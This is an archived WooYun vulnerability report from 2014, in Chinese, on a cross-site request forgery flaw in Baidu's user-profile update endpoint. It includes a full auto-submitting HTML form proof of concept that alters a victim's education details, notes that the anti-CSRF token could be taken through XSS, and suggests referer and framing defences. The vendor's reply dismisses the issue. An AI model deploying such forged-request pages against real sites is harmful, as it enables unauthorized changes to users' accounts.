当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062905

漏洞标题:百度修改用户信息接口crsf漏洞, 结合xss可以修改用户信息

相关厂商:百度

漏洞作者: 路人甲

提交时间:2014-07-09 18:26

修复时间:2014-07-10 11:36

公开时间:2014-07-10 11:36

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百度修改用户信息接口crsf漏洞, 结合xss可以修改用户信息

详细说明:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>tt</title>
</head>
<body>
<form id="myForm" action="http://passport.baidu.com/v2/?ucenterset" method="post">
<input name="jump_url" value="http://www.baidu.com/p/setting/profile/proxy" type="text" />
<input name="bdstoken" value="7ba43e67cc5cc904b8ebb2ff787ecac6" type="text" />
<input name="ie" value="utf8" type="text" />
<input name="tpl" value="pcs" type="text" />
<input name="passport_highschool_0_enter_year" value="2013" type="text" />
<input name="passport_highschool_0_school_name" value="北京大学" type="text" />
<input type="submit" name="Button1" value="Button" id="Button1" />
</form>
<script type="text/javascript">
document.getElementById('myForm').submit();
</script>
</body>
</html>


如果这段代码被iframe, 就可以修改用户资料了
当然这里百度加了一个token验证, 但是token在前端页面有展示(http://www.baidu.com/p/setting/profile/education, 查看源码)
现在只需要一枚xss漏洞, 就可以轻松搞定(虽然我现在还没有)

漏洞证明:

由于目前没有找到合适的xss漏洞, 获取token
暂时只能自己玩自己

修复方案:

http://passport.baidu.com/v2/?ucenterset
当然不限于此接口, 所有跟着接口策略相同的(token策略)
加refer判断, 最好是强refer, 对应的入口页面加frame策略
token 能起到一定作用, 但是其他地方一旦报出xss漏洞, 这个就无效了

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-10 11:36

厂商回复:

如果存在XSS漏洞,直接可以修改用户信息。

最新状态:

暂无